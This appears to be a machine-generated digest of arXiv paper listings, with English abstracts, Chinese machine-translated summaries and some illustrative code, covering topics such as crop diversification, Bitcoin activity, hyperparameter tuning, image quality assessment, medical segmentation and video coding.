  • for: 这个论文是为了研究农业可持续强化的方法,以及这些方法在气候变化的情况下的影响。
  • methods: 这篇论文使用了多种数据和机器学习方法来研究农业生产力的影响。
  • results: 论文发现,在更暖和干燥的气候下,多种作物杂 cultivation 能够提高农业生产力,平均提高了2.8%。这种效果与高温和低湿度有相互作用。
    Abstract The concept of sustainable intensification in agriculture necessitates the implementation of management practices that prioritize sustainability without compromising productivity. However, the effects of such practices are known to depend on environmental conditions, and are therefore expected to change as a result of a changing climate. We study the impact of crop diversification on productivity in the context of climate change. We leverage heterogeneous Earth Observation data and contribute a data-driven approach based on causal machine learning for understanding how crop diversification impacts may change in the future. We apply this method to the country of Cyprus throughout a 4-year period. We find that, on average, crop diversification significantly benefited the net primary productivity of crops, increasing it by 2.8%. The effect generally synergized well with higher maximum temperatures and lower soil moistures. In a warmer and more drought-prone climate, we conclude that crop diversification exhibits promising adaptation potential and is thus a sensible policy choice with regards to agricultural productivity for present and future.
    摘要 农业可持续集约化的概念要求在不牺牲生产力的前提下,实施以可持续性为优先的管理措施。然而,这些措施的效果取决于环境条件,因此预计会随着气候变化而改变。我们在气候变化背景下研究作物多样化种植对生产力的影响,利用异构的地球观测数据,提出了一种基于因果机器学习的数据驱动方法,以理解作物多样化的影响在未来可能如何变化。我们将该方法应用于塞浦路斯全国,覆盖4年时间。结果显示,平均而言,作物多样化显著提升了作物的净初级生产力,增幅为2.8%;这一效应通常与更高的最高气温和更低的土壤湿度产生协同作用。我们据此认为,在更暖和更易干旱的气候下,作物多样化展现出可观的适应潜力,因而就当前和未来的农业生产力而言,是一项合理的政策选择。
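
The paper's causal-ML estimator on Earth Observation data is not reproduced here; as a generic stand-in, the following T-learner sketch on synthetic data shows how a heterogeneous effect of diversification with respect to temperature and soil moisture could be estimated:

```python
import numpy as np
from sklearn.ensemble import GradientBoostingRegressor

rng = np.random.default_rng(0)
n = 2000
X = rng.normal(size=(n, 3))            # e.g. max temperature, soil moisture, NDVI history
T = rng.integers(0, 2, size=n)         # 1 = diversified parcel, 0 = monoculture
# Synthetic outcome: diversification helps more when it is hot and dry.
tau = 0.5 + 0.3 * X[:, 0] - 0.3 * X[:, 1]
y = X @ np.array([0.2, 0.5, 0.1]) + T * tau + rng.normal(scale=0.5, size=n)

# T-learner: one outcome model per treatment arm; CATE = difference of predictions.
m1 = GradientBoostingRegressor().fit(X[T == 1], y[T == 1])
m0 = GradientBoostingRegressor().fit(X[T == 0], y[T == 0])
cate = m1.predict(X) - m0.predict(X)
print(f"estimated ATE: {cate.mean():.2f}  (true: {tau.mean():.2f})")
```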

Temporal and Geographical Analysis of Real Economic Activities in the Bitcoin Blockchain

  • paper_url: http://arxiv.org/abs/2307.08616
  • repo_url: None
  • paper_authors: Rafael Ramos Tubino, Remy Cazabet, Natkamon Tovanich, Celine Robardet
  • for: 这篇论文关注比特币区块链上真实的经济活动,具体而言是零售用户及其邻居之间的交易,而非市场、交易所或其他服务等机构之间的交易。
  • methods: 论文提出一种归纳方法,将比特币玩家分为三类:固定接收者(FR)、邻居 FR 和其他人。
  • results: 实际交易主要发生在固定接收者身上,占总交易值的小部分,但占所有支付的重要部分,这引发了中央化的担忧。论文还进行了每周活动模式分析,提供了比特币用户的地理位置信息,并且量化了一个常见的数据集的偏见。
    Abstract We study the real economic activity in the Bitcoin blockchain that involves transactions from/to retail users rather than between organizations such as marketplaces, exchanges, or other services. We first introduce a heuristic method to classify Bitcoin players into three main categories: Frequent Receivers (FR), Neighbors of FR, and Others. We show that most real transactions involve Frequent Receivers, representing a small fraction of the total value exchanged according to the blockchain, but a significant fraction of all payments, raising concerns about the centralization of the Bitcoin ecosystem. We also conduct a weekly pattern analysis of activity, providing insights into the geographical location of Bitcoin users and allowing us to quantify the bias of a well-known dataset for actor identification.
    摘要 我们研究比特币区块链上真实的经济活动,即涉及零售用户的交易,而非市场、交易所或其他服务等机构之间的交易。我们首先提出一种启发式方法,将比特币参与者分为三大类:高频接收者(FR)、FR的邻居和其他。我们发现,大多数真实交易都涉及高频接收者;按区块链统计,他们只占交易总额的一小部分,却占全部支付笔数的相当比例,这引发了对比特币生态系统中心化的担忧。我们还对活动进行了每周模式分析,得到了关于比特币用户地理位置的洞见,并得以量化一个知名的参与者识别数据集的偏差。

Hyperparameter Tuning Cookbook: A guide for scikit-learn, PyTorch, river, and spotPython

  • paper_url: http://arxiv.org/abs/2307.10262
  • repo_url: https://github.com/sequential-parameter-optimization/spotpython
  • paper_authors: Thomas Bartz-Beielstein
  • for: 本文提供了一个完整的超参数优化指南,使用 spotPython 对 scikit-learn、PyTorch 和 river 中的模型进行调优。
  • methods: 本文介绍了 spotPython 基于代理模型(surrogate model)的优化过程,并详细说明了超参数调优的流程。
  • results: 本文通过多个案例研究,包括 sklearn 模型 Support Vector Classification、Random Forests、Gradient Boosting (XGB) 和 K-nearest neighbors (KNN) 的 hyperparameter tuning,以及 river 中的 Hoeffding Adaptive Tree Regressor。 plus, the integration of spotPython into the PyTorch and PyTorch Lightning training workflow is also discussed.
    Abstract This document provides a comprehensive guide to hyperparameter tuning using spotPython for scikit-learn, PyTorch, and river. The first part introduces spotPython's surrogate model-based optimization process, while the second part focuses on hyperparameter tuning. Several case studies are presented, including hyperparameter tuning for sklearn models such as Support Vector Classification, Random Forests, Gradient Boosting (XGB), and K-nearest neighbors (KNN), as well as a Hoeffding Adaptive Tree Regressor from river. The integration of spotPython into the PyTorch and PyTorch Lightning training workflow is also discussed. With a hands-on approach and step-by-step explanations, this cookbook serves as a practical starting point for anyone interested in hyperparameter tuning with Python. Highlights include the interplay between Tensorboard, PyTorch Lightning, spotPython, and river. This publication is under development, with updates available on the corresponding webpage.
    摘要 这份文档提供了使用spotPython进行scikit-learn、PyTorch和river中的参数优化的全面指南。文档的首部介绍了spotPython的代理模型基于优化过程,而第二部分则专注于参数优化。文档包含了多个案例研究,包括scikit-learn模型如支持向量分类、随机森林、梯度折衔(XGB)和K最近邻(KNN)等,以及来自river的韦伯丁适应树回归模型。文档还讨论了spotPython在PyTorch和PyTorch Lightning训练工作流程中的集成。通过实践的方式和步骤说明,这本cookbook作为Python中参数优化的实践开始点,强调了Tensorboard、PyTorch Lightning、spotPython和river之间的互动。这份文档正在开发中,更新信息可以通过相应的网页获得。
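
spotPython's surrogate-model-based tuner is not reproduced here (its API is not shown in this digest); the following scikit-learn-only grid search simply illustrates the kind of tuning problem the cookbook walks through:

```python
from sklearn.datasets import load_iris
from sklearn.model_selection import GridSearchCV
from sklearn.svm import SVC

X, y = load_iris(return_X_y=True)
# Hyperparameter grid for Support Vector Classification (one of the cookbook's cases).
param_grid = {"C": [0.1, 1, 10, 100], "gamma": [0.01, 0.1, 1], "kernel": ["rbf"]}
search = GridSearchCV(SVC(), param_grid, cv=5, scoring="accuracy")
search.fit(X, y)
print(search.best_params_, round(search.best_score_, 3))
```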

Artificial Intelligence for the Electron Ion Collider (AI4EIC)

  • paper_url: http://arxiv.org/abs/2307.08593
  • repo_url: None
  • paper_authors: C. Allaire, R. Ammendola, E. -C. Aschenauer, M. Balandat, M. Battaglieri, J. Bernauer, M. Bondì, N. Branson, T. Britton, A. Butter, I. Chahrour, P. Chatagnon, E. Cisbani, E. W. Cline, S. Dash, C. Dean, W. Deconinck, A. Deshpande, M. Diefenthaler, R. Ent, C. Fanelli, M. Finger, M. Finger, Jr., E. Fol, S. Furletov, Y. Gao, J. Giroux, N. C. Gunawardhana Waduge, R. Harish, O. Hassan, P. L. Hegde, R. J. Hernández-Pinto, A. Hiller Blin, T. Horn, J. Huang, D. Jayakodige, B. Joo, M. Junaid, P. Karande, B. Kriesten, R. Kunnawalkam Elayavalli, M. Lin, F. Liu, S. Liuti, G. Matousek, M. McEneaney, D. McSpadden, T. Menzo, T. Miceli, V. Mikuni, R. Montgomery, B. Nachman, R. R. Nair, J. Niestroy, S. A. Ochoa Oregon, J. Oleniacz, J. D. Osborn, C. Paudel, C. Pecar, C. Peng, G. N. Perdue, W. Phelps, M. L. Purschke, K. Rajput, Y. Ren, D. F. Renteria-Estrada, D. Richford, B. J. Roy, D. Roy, N. Sato, T. Satogata, G. Sborlini, M. Schram, D. Shih, J. Singh, R. Singh, A. Siodmok, P. Stone, J. Stevens, L. Suarez, K. Suresh, A. -N. Tawfik, F. Torales Acosta, N. Tran, R. Trotta, F. J. Twagirayezu, R. Tyson, S. Volkova, A. Vossen, E. Walter, D. Whiteson, M. Williams, S. Wu, N. Zachariou, P. Zurita
  • for: 这篇论文是为EIC社区写的,探讨了AI/ML在该设施的实验和启动过程中的潜在应用。
  • methods: 论文涵盖了EIC社区当前在进行的多个R&D项目和方法,包括其他实验中的前沿技术。
  • results: 论文提供了EIC社区对AI/ML的应用 goals和策略的概述,以及通过其应用可以获得的优点和发现。
    Abstract The Electron-Ion Collider (EIC), a state-of-the-art facility for studying the strong force, is expected to begin commissioning its first experiments in 2028. This is an opportune time for artificial intelligence (AI) to be included from the start at this facility and in all phases that lead up to the experiments. The second annual workshop organized by the AI4EIC working group, which recently took place, centered on exploring all current and prospective application areas of AI for the EIC. This workshop is not only beneficial for the EIC, but also provides valuable insights for the newly established ePIC collaboration at EIC. This paper summarizes the different activities and R&D projects covered across the sessions of the workshop and provides an overview of the goals, approaches and strategies regarding AI/ML in the EIC community, as well as cutting-edge techniques currently studied in other experiments.
    摘要 电子离子对撞机(EIC)是研究强相互作用的最先进设施,预计将于2028年开始其首批实验的调试。这是一个将人工智能(AI)从一开始就纳入该设施、并贯穿通往实验的各个阶段的良机。AI4EIC工作组最近举办了第二届年度研讨会,重点探讨了AI在EIC中当前及未来的各个应用领域。该研讨会不仅对EIC有益,也为EIC新成立的ePIC合作组提供了宝贵的经验。本文总结了研讨会各环节涵盖的活动与研发项目,概述了EIC社区在AI/ML方面的目标、方法与策略,以及其他实验目前正在研究的前沿技术。

Snapshot Spectral Clustering – a costless approach to deep clustering ensembles generation

  • paper_url: http://arxiv.org/abs/2307.08591
  • repo_url: None
  • paper_authors: Adam Piróg, Halina Kwaśnicka
  • for: 本研究旨在探讨将深度学习与聚类结合使用,以提高聚类结果的准确性和稳定性。
  • methods: 本研究提出了一种新的深度聚类协同方法(Snapshot Spectral Clustering),利用多个视角的数据生成多个深度学习模型,并将其组合以实现更高的聚类精度和稳定性。
  • results: 实验结果表明,Snapshot Spectral Clustering方法可以减少计算成本,同时提高聚类结果的准确性和稳定性,相比于传统的聚类方法和深度学习方法。
    Abstract Despite tremendous advancements in Artificial Intelligence, learning from large sets of data in an unsupervised manner remains a significant challenge. Classical clustering algorithms often fail to discover complex dependencies in large datasets, especially considering sparse, high-dimensional spaces. However, deep learning techniques proved to be successful when dealing with large quantities of data, efficiently reducing their dimensionality without losing track of underlying information. Several interesting advancements have already been made to combine deep learning and clustering. Still, the idea of enhancing the clustering results by combining multiple views of the data generated by deep neural networks appears to be insufficiently explored yet. This paper aims to investigate this direction and bridge the gap between deep neural networks, clustering techniques and ensemble learning methods. To achieve this goal, we propose a novel deep clustering ensemble method - Snapshot Spectral Clustering, designed to maximize the gain from combining multiple data views while minimizing the computational costs of creating the ensemble. Comparative analysis and experiments described in this paper prove the proposed concept, while the conducted hyperparameter study provides a valuable intuition to follow when selecting proper values.
    摘要 To achieve this goal, we propose a novel deep clustering ensemble method called Snapshot Spectral Clustering. This method is designed to maximize the gain from combining multiple data views while minimizing computational costs. Our comparative analysis and experiments show that the proposed method is effective, and a hyperparameter study provides valuable intuition for selecting appropriate values.

eess.IV - 2023-07-18

Regression-free Blind Image Quality Assessment

  • paper_url: http://arxiv.org/abs/2307.09279
  • repo_url: https://github.com/XiaoqiWang/regression-free-iqa
  • paper_authors: Xiaoqi Wang, Jian Xiong, Hao Gao, Weisi Lin
  • for: 提高盲图像质量评估模型的准确性,避免因训练样本存在偏差而导致模型参数估计出现偏倚。
  • methods: 基于检索相似图像的快速准确评估方法,包括semantic-based classification(SC)模块和distortion-based classification(DC)模块。
  • results: 在四个基准数据库上的实验表明,该方法能够显著优于当前最先进的基于回归的模型。
    Abstract Regression-based blind image quality assessment (IQA) models are susceptible to biased training samples, leading to a biased estimation of model parameters. To mitigate this issue, we propose a regression-free framework for image quality evaluation, which is founded upon retrieving similar instances by incorporating semantic and distortion features. The motivation behind this approach is rooted in the observation that the human visual system (HVS) has analogous visual responses to semantically similar image contents degraded by the same distortion. The proposed framework comprises two classification-based modules: semantic-based classification (SC) module and distortion-based classification (DC) module. Given a test image and an IQA database, the SC module retrieves multiple pristine images based on semantic similarity. The DC module then retrieves instances based on distortion similarity from the distorted images that correspond to each retrieved pristine image. Finally, the predicted quality score is derived by aggregating the subjective quality scores of multiple retrieved instances. Experimental results on four benchmark databases validate that the proposed model can remarkably outperform the state-of-the-art regression-based models.
    摘要 基于回归的盲图像质量评估(IQA)模型容易受到有偏训练样本的影响，导致模型参数估计出现偏差。为了缓解这个问题，我们提出了一种不含回归的图像质量评估框架，基于检索相似实例。我们的动机在于：人类视觉系统(HVS)对语义相似且受到相同失真的图像内容具有相似的视觉响应。该框架包括两个分类模块：基于语义的分类(SC)模块和基于失真的分类(DC)模块。给定一个测试图像和IQA数据库，SC模块首先根据语义相似性检索多张原始图像，然后DC模块从相应的失真图像中检索具有相似失真的实例。最后，预测的质量分数由多个检索到的实例的主观质量分数汇总得来。在四个基准数据库上的实验结果表明，我们提出的模型可以显著超越当前最先进的回归型模型。
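The retrieval-and-aggregate procedure can be sketched in a few lines. The snippet below is a minimal illustration rather than the authors' implementation: it assumes pre-computed semantic and distortion feature vectors (e.g., from any pretrained network) and a database whose entries hold a pristine image's semantic feature, its distorted versions' distortion features, and their subjective scores; names such as `semantic_feat` and `k_sem` are hypothetical.

```python
import numpy as np

def cosine_topk(query, bank, k):
    """Return indices of the k nearest bank rows to query by cosine similarity."""
    q = query / (np.linalg.norm(query) + 1e-8)
    b = bank / (np.linalg.norm(bank, axis=1, keepdims=True) + 1e-8)
    return np.argsort(-(b @ q))[:k]

def regression_free_score(test_sem, test_dist, db, k_sem=5, k_dist=3):
    """db: list of dicts, one per pristine image, each holding the pristine image's
    semantic feature and its distorted versions (distortion features + MOS scores)."""
    sem_bank = np.stack([e["semantic_feat"] for e in db])
    retrieved_scores = []
    for i in cosine_topk(test_sem, sem_bank, k_sem):          # SC module
        entry = db[i]
        dist_bank = np.stack(entry["distortion_feats"])
        for j in cosine_topk(test_dist, dist_bank, k_dist):   # DC module
            retrieved_scores.append(entry["mos"][j])
    return float(np.mean(retrieved_scores))                   # aggregate subjective scores
```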

Soft-IntroVAE for Continuous Latent space Image Super-Resolution

  • paper_url: http://arxiv.org/abs/2307.09008
  • repo_url: None
  • paper_authors: Zhi-Song Liu, Zijia Wang, Zhen Jia
  • for: 这个研究是为了提出一个基于Variational AutoEncoder的连续图像超解析方法，以提供实用和灵活的图像扩展，用于不同的显示器。
  • methods: 本研究使用了Local implicit image representation来将坐标和2D特征映射到隐藏空间中,并通过一种新的潜在空间对抗训练来实现照相实际的图像重建。
  • results: 研究人员透过量化和质感比较,证明了提案的Soft-introVAE-SR方法的效果,并且显示了其在对照噪声和实际图像超解析中的一般化能力。
    Abstract Continuous image super-resolution (SR) recently receives a lot of attention from researchers, for its practical and flexible image scaling for various displays. Local implicit image representation is one of the methods that can map the coordinates and 2D features for latent space interpolation. Inspired by Variational AutoEncoder, we propose a Soft-introVAE for continuous latent space image super-resolution (SVAE-SR). A novel latent space adversarial training is achieved for photo-realistic image restoration. To further improve the quality, a positional encoding scheme is used to extend the original pixel coordinates by aggregating frequency information over the pixel areas. We show the effectiveness of the proposed SVAE-SR through quantitative and qualitative comparisons, and further, illustrate its generalization in denoising and real-image super-resolution.
    摘要 连续图像超分辨率 (SR) 技术近来受到研究者的广泛关注，因为它能够为多种显示器提供实用且灵活的图像缩放。本地隐式图像表示是一种可以将坐标和2D特征映射到隐空间以进行插值的方法。受 Variational AutoEncoder 的启发，我们提出了用于连续隐空间图像超分辨率的 Soft-introVAE (SVAE-SR)，并实现了一种新的隐空间对抗训练，以达到照片级真实的图像复原。为了进一步提高质量，我们使用了一种位置编码方案，通过在像素区域上聚合频率信息来扩展原始像素坐标。我们通过定量和定性比较展示了 SVAE-SR 的有效性，并进一步展示了其在去噪和真实图像超分辨率上的泛化能力。
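The positional-encoding step (extending pixel coordinates with aggregated frequency information) can be sketched as a standard Fourier feature encoding. The band count and frequency spacing below are assumptions for illustration, not the paper's exact scheme:

```python
import torch

def fourier_positional_encoding(coords, num_bands=8):
    """coords: (N, 2) pixel coordinates normalised to [-1, 1].
    Returns (N, 2 + 4*num_bands) features: raw coordinates plus sin/cos at
    exponentially spaced frequencies, so the decoder sees frequency content
    of each query location."""
    freqs = 2.0 ** torch.arange(num_bands, dtype=coords.dtype)      # (B,)
    angles = coords.unsqueeze(-1) * freqs * torch.pi                 # (N, 2, B)
    enc = torch.cat([torch.sin(angles), torch.cos(angles)], dim=-1)  # (N, 2, 2B)
    return torch.cat([coords, enc.flatten(1)], dim=-1)

# Example: encode the query coordinates of a 3x upscaled 32x32 patch
ys, xs = torch.meshgrid(torch.linspace(-1, 1, 96), torch.linspace(-1, 1, 96), indexing="ij")
queries = fourier_positional_encoding(torch.stack([xs, ys], dim=-1).reshape(-1, 2))
```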

Frequency-mixed Single-source Domain Generalization for Medical Image Segmentation

  • paper_url: http://arxiv.org/abs/2307.09005
  • repo_url: https://github.com/liamheng/non-iid_medical_image_segmentation
  • paper_authors: Heng Li, Haojin Li, Wei Zhao, Huazhu Fu, Xiuyun Su, Yan Hu, Jiang Liu
  • for: 提高医疗影像分类模型的普遍性,特别是当标注数据短缺时。
  • methods: 提出了一个叫做“频率混合单源领域普遍化法”(FreeSDG),利用不同频率的混合 Spectrum 来增强单源领域,同时运用自我监督来学习具有上下文感知的表示。
  • results: 实验结果显示,FreeSDG 比前一代方法更有效率,可以优化医疗影像分类模型的普遍性,特别是当标注数据短缺时。
    Abstract The annotation scarcity of medical image segmentation poses challenges in collecting sufficient training data for deep learning models. Specifically, models trained on limited data may not generalize well to other unseen data domains, resulting in a domain shift issue. Consequently, domain generalization (DG) is developed to boost the performance of segmentation models on unseen domains. However, the DG setup requires multiple source domains, which impedes the efficient deployment of segmentation algorithms in clinical scenarios. To address this challenge and improve the segmentation model's generalizability, we propose a novel approach called the Frequency-mixed Single-source Domain Generalization method (FreeSDG). By analyzing the frequency's effect on domain discrepancy, FreeSDG leverages a mixed frequency spectrum to augment the single-source domain. Additionally, self-supervision is constructed in the domain augmentation to learn robust context-aware representations for the segmentation task. Experimental results on five datasets of three modalities demonstrate the effectiveness of the proposed algorithm. FreeSDG outperforms state-of-the-art methods and significantly improves the segmentation model's generalizability. Therefore, FreeSDG provides a promising solution for enhancing the generalization of medical image segmentation models, especially when annotated data is scarce. The code is available at https://github.com/liamheng/Non-IID_Medical_Image_Segmentation.
    摘要 医学影像分割的标注缺乏问题使得深度学习模型的训练数据不够，这会导致模型在未见的数据域上泛化能力不足。为了解决这个问题，域泛化（DG）技术被开发出来，以提高分割模型在未见数据域上的性能。然而，DG设置需要多个源域，这阻碍了分割算法在临床场景中的高效部署。为了解决这个挑战并提高分割模型的泛化性，我们提出了一种新的方法：频率混合单源域泛化方法（FreeSDG）。通过分析频率对域差异的影响，FreeSDG利用混合频率谱来扩增单源域。此外，我们还在域扩增中构建了自监督学习，以学习对分割任务鲁棒的上下文感知表示。在三种模态的五个数据集上的实验结果表明，FreeSDG方法优于当前最先进的方法，并显著提高了分割模型的泛化性。因此，FreeSDG为提升医学影像分割模型的泛化能力提供了一种有前景的解决方案，特别是在标注数据稀缺的情况下。代码可以在 https://github.com/liamheng/Non-IID_Medical_Image_Segmentation 获取。
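One common way to mix frequency content between two images is to blend their low-frequency amplitude spectra in the Fourier domain. The sketch below illustrates that generic idea; the exact mixing used by FreeSDG (and the self-supervision built on top of it) is not reproduced here, and the blend ratio and band radius are assumed values:

```python
import numpy as np

def frequency_mix(img_a, img_b, alpha=0.5, radius=0.1):
    """Blend the low-frequency amplitude spectrum of img_b into img_a while keeping
    img_a's phase, synthesising a new 'source-like' view of the same anatomy.
    img_a, img_b: float arrays of identical shape (H, W)."""
    fa, fb = np.fft.fftshift(np.fft.fft2(img_a)), np.fft.fftshift(np.fft.fft2(img_b))
    amp_a, amp_b, phase_a = np.abs(fa), np.abs(fb), np.angle(fa)
    h, w = img_a.shape
    cy, cx, r = h // 2, w // 2, int(radius * min(h, w))
    mask = np.zeros((h, w), dtype=bool)
    mask[cy - r:cy + r, cx - r:cx + r] = True           # low-frequency band
    amp_a[mask] = (1 - alpha) * amp_a[mask] + alpha * amp_b[mask]
    mixed = np.fft.ifft2(np.fft.ifftshift(amp_a * np.exp(1j * phase_a)))
    return np.real(mixed)
```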

Learned Scalable Video Coding For Humans and Machines

  • paper_url: http://arxiv.org/abs/2307.08978
  • repo_url: None
  • paper_authors: Hadi Hadizadeh, Ivan V. Bajić
  • for: 这个论文主要是为了支持自动视频分析,而不是人类视觉。
  • methods: 该论文使用了深度神经网络(DNN)来实现视频编码,并使用了 conditional coding 来提高压缩效果。
  • results: 实验结果表明,该系统在基层和优化层中都可以实现更好的压缩效果,并且可以在机器视觉任务和人类视觉任务之间进行可替换。
    Abstract Video coding has traditionally been developed to support services such as video streaming, videoconferencing, digital TV, and so on. The main intent was to enable human viewing of the encoded content. However, with the advances in deep neural networks (DNNs), encoded video is increasingly being used for automatic video analytics performed by machines. In applications such as automatic traffic monitoring, analytics such as vehicle detection, tracking and counting, would run continuously, while human viewing could be required occasionally to review potential incidents. To support such applications, a new paradigm for video coding is needed that will facilitate efficient representation and compression of video for both machine and human use in a scalable manner. In this manuscript, we introduce the first end-to-end learnable video codec that supports a machine vision task in its base layer, while its enhancement layer supports input reconstruction for human viewing. The proposed system is constructed based on the concept of conditional coding to achieve better compression gains. Comprehensive experimental evaluations conducted on four standard video datasets demonstrate that our framework outperforms both state-of-the-art learned and conventional video codecs in its base layer, while maintaining comparable performance on the human vision task in its enhancement layer. We will provide the implementation of the proposed system at www.github.com upon completion of the review process.
    摘要 视频编码传统上是为视频流媒体、视频会议、数字电视等服务开发的，主要目的是供人类观看编码内容。然而，随着深度神经网络（DNN）的发展，编码视频越来越多地被用于机器自动视频分析。例如，在自动交通监测应用中，车辆检测、跟踪和计数等分析会持续运行，而人类只需偶尔查看潜在的事故。为支持这些应用，我们需要一种新的视频编码范式，能够以可伸缩的方式高效地表示和压缩视频，以便同时支持机器和人类的使用。在这篇论文中，我们介绍了首个端到端可学习的视频编码器，其基本层支持机器视觉任务，而增强层支持供人类观看的输入重建。该系统基于条件编码（conditional coding）的概念，以获得更好的压缩增益。我们在四个标准视频数据集上进行了广泛的实验评估，结果表明我们的框架在基本层上优于当前最先进的可学习和传统视频编码器，同时在增强层的人类视觉任务上保持了相当的性能。在审稿完成后，我们将在 www.github.com 上提供所提系统的实现。

Deep Physics-Guided Unrolling Generalization for Compressed Sensing

  • paper_url: http://arxiv.org/abs/2307.08950
  • repo_url: https://github.com/guaishou74851/prl
  • paper_authors: Bin Chen, Jiechong Song, Jingfen Xie, Jian Zhang
  • for: 这篇论文主要是为了提出一种高精度且可解释的图像重建方法,兼顾了模型驱动和数据驱动方法的优点,以解决 inverse imaging зада题中的问题。
  • methods: 这篇论文提出了一种基于高维特征空间的Physics-guided unrolled recovery learning(PRL)框架,通过普通迭代法实现高精度的图像重建。此外,作者还提出了两种实现方式:PRL-PGD和PRL-RND。
  • results: 实验表明,PRL 网络比其他状态 искусственный方法具有显著的性能和效率优势,并且还有很大的应用前景,可以应用于其他 inverse imaging 问题或优化模型。
    Abstract By absorbing the merits of both the model- and data-driven methods, deep physics-engaged learning scheme achieves high-accuracy and interpretable image reconstruction. It has attracted growing attention and become the mainstream for inverse imaging tasks. Focusing on the image compressed sensing (CS) problem, we find the intrinsic defect of this emerging paradigm, widely implemented by deep algorithm-unrolled networks, in which more plain iterations involving real physics will bring enormous computation cost and long inference time, hindering their practical application. A novel deep $\textbf{P}$hysics-guided un$\textbf{R}$olled recovery $\textbf{L}$earning ($\textbf{PRL}$) framework is proposed by generalizing the traditional iterative recovery model from image domain (ID) to the high-dimensional feature domain (FD). A compact multiscale unrolling architecture is then developed to enhance the network capacity and keep real-time inference speeds. Taking two different perspectives of optimization and range-nullspace decomposition, instead of building an algorithm-specific unrolled network, we provide two implementations: $\textbf{PRL-PGD}$ and $\textbf{PRL-RND}$. Experiments exhibit the significant performance and efficiency leading of PRL networks over other state-of-the-art methods with a large potential for further improvement and real application to other inverse imaging problems or optimization models.
    摘要 通过吸收模型驱动和数据驱动方法的优点，深度物理参与学习方案实现了高精度且可解释的图像重建，在逆成像任务中吸引了越来越多的关注并成为主流。但是，针对图像压缩感知（CS）问题，我们发现了这一由深度算法展开网络广泛实现的新兴范式的内在缺陷：更多包含真实物理过程的朴素迭代会带来巨大的计算成本和较长的推理时间，限制其实际应用。为解决这个问题，我们提出了一种新的深度物理指导展开恢复学习（PRL）框架，将传统的迭代恢复模型从图像域（ID）推广到高维特征域（FD）。随后，我们设计了一种紧凑的多尺度展开架构，以增强网络容量并保持实时的推理速度。我们从优化和值域-零空间分解两个不同的视角出发，而不是构建特定于某一算法的展开网络，给出了两种实现：PRL-PGD和PRL-RND。实验结果表明，PRL网络相比其他当前最佳方法具有显著的性能和效率优势，并且还有很大的进一步提升空间，可应用于其他逆成像问题或优化模型。
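Algorithm unrolling of this kind can be illustrated with a generic K-step unrolled proximal gradient network, where the proximal step is a small learned CNN. This sketch is only the textbook PGD-unrolling pattern; the actual PRL-PGD operates in a high-dimensional feature domain with a multiscale architecture, which is not reproduced here:

```python
import torch
import torch.nn as nn

class UnrolledPGD(nn.Module):
    """Generic K-step unrolled proximal gradient descent for y = A x + noise."""
    def __init__(self, steps=8, channels=32):
        super().__init__()
        self.steps = steps
        self.step_size = nn.Parameter(torch.full((steps,), 0.5))
        self.prox = nn.ModuleList([
            nn.Sequential(nn.Conv2d(1, channels, 3, padding=1), nn.ReLU(),
                          nn.Conv2d(channels, 1, 3, padding=1))
            for _ in range(steps)
        ])

    def forward(self, y, A, At, x0):
        """A / At: callables applying the measurement operator and its adjoint."""
        x = x0
        for k in range(self.steps):
            grad = At(A(x) - y)                     # data-fidelity gradient
            x = x - self.step_size[k] * grad        # gradient step
            x = x + self.prox[k](x)                 # learned proximal (residual) step
        return x
```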

Image Processing Methods Applied to Motion Tracking of Nanomechanical Buckling on SEM Recordings

  • paper_url: http://arxiv.org/abs/2307.08786
  • repo_url: None
  • paper_authors: Ege Erdem, Berke Demiralp, Hadi S Pisheh, Peyman Firoozy, Ahmet Hakan Karakurt, M. Selim Hanay
  • for: 这个论文是为了解决扫描电子显微镜(SEM)记录的动态纳米电romechanical系统(NEMS)的问题,因为噪声引起的低帧率、不足的分辨率和由应用的电 potential所引起的模糊。
  • methods: 这个论文使用了一种基于物理系统的图像处理算法,用于跟踪NEMS结构在高噪声水平下的动态运动。该算法包括一个图像滤波器、两个数据滤波器和一个非线性回归模型,利用物理解决方案的预期形式。
  • results: 该算法可以跟踪NEMS的动态运动和捕捉了压缩力对矩形杆的弯曲强度的依赖关系。通过该算法,可以清晰地分解NEMS在SEM记录中的转换从间隙弯曲到内隙弯曲的过程。
    Abstract The scanning electron microscope (SEM) recordings of dynamic nano-electromechanical systems (NEMS) are difficult to analyze due to the noise caused by low frame rate, insufficient resolution and blurriness induced by applied electric potentials. Here, we develop an image processing algorithm enhanced by the physics of the underlying system to track the motion of buckling NEMS structures in the presence of high noise levels. The algorithm is composed of an image filter, two data filters, and a nonlinear regression model, which utilizes the expected form of the physical solution. The method was applied to the recordings of a NEMS beam about 150 nm wide, undergoing intra-and inter-well post-buckling states with a transition rate of approximately 0.5 Hz. The algorithm can track the dynamical motion of the NEMS and capture the dependency of deflection amplitude on the compressive force on the beam. With the help of the proposed algorithm, the transition from inter-well to intra-well motion is clearly resolved for buckling NEMS imaged under SEM.
    摘要 扫描电子显微镜（SEM）对动态纳米机电系统（NEMS）的记录由于帧率低、分辨率不足以及所施加电位引起的模糊而难以分析。为此，我们开发了一种结合底层系统物理的图像处理算法，用于在高噪声水平下跟踪屈曲NEMS结构的运动。该算法包括一个图像滤波器、两个数据滤波器和一个非线性回归模型，后者利用了物理解的预期形式。该方法应用于一根宽约150nm的NEMS梁，该梁以约0.5Hz的跃迁速率经历阱内与阱间的后屈曲状态。该算法能够跟踪NEMS的动态运动，并捕捉梁的挠度幅值对压缩力的依赖关系。借助所提算法，可以清晰地分辨SEM图像中屈曲NEMS从阱间运动到阱内运动的转变。
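The final regression step can be illustrated with a scipy fit of the tracked deflection amplitude to an assumed post-buckling law (amplitude growing as the square root of the load above a critical value). Both the functional form and the synthetic data below are illustrative assumptions, not the paper's exact model:

```python
import numpy as np
from scipy.optimize import curve_fit

def postbuckling_amplitude(force, f_crit, scale):
    """Hypothetical post-buckling law: deflection grows as sqrt(F - F_c) above the
    critical load and is zero below it."""
    return scale * np.sqrt(np.clip(force - f_crit, 0.0, None))

# force: applied compressive force per frame; amplitude: deflection from image tracking
force = np.linspace(0.0, 2.0, 40)
amplitude = postbuckling_amplitude(force, 0.8, 1.5) + 0.05 * np.random.randn(force.size)

p_fit, _ = curve_fit(postbuckling_amplitude, force, amplitude, p0=[0.5, 1.0])
print("estimated critical load:", p_fit[0])
```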

Implementation of a perception system for autonomous vehicles using a detection-segmentation network in SoC FPGA

  • paper_url: http://arxiv.org/abs/2307.08682
  • repo_url: https://github.com/vision-agh/mt_kria
  • paper_authors: Maciej Baczmanski, Mateusz Wasala, Tomasz Kryjak
  • for: 本研究旨在开发一种高效、实时、能效的自动驾驶感知控制系统,以满足不同道路条件下的障碍物识别和环境元素识别等功能要求。
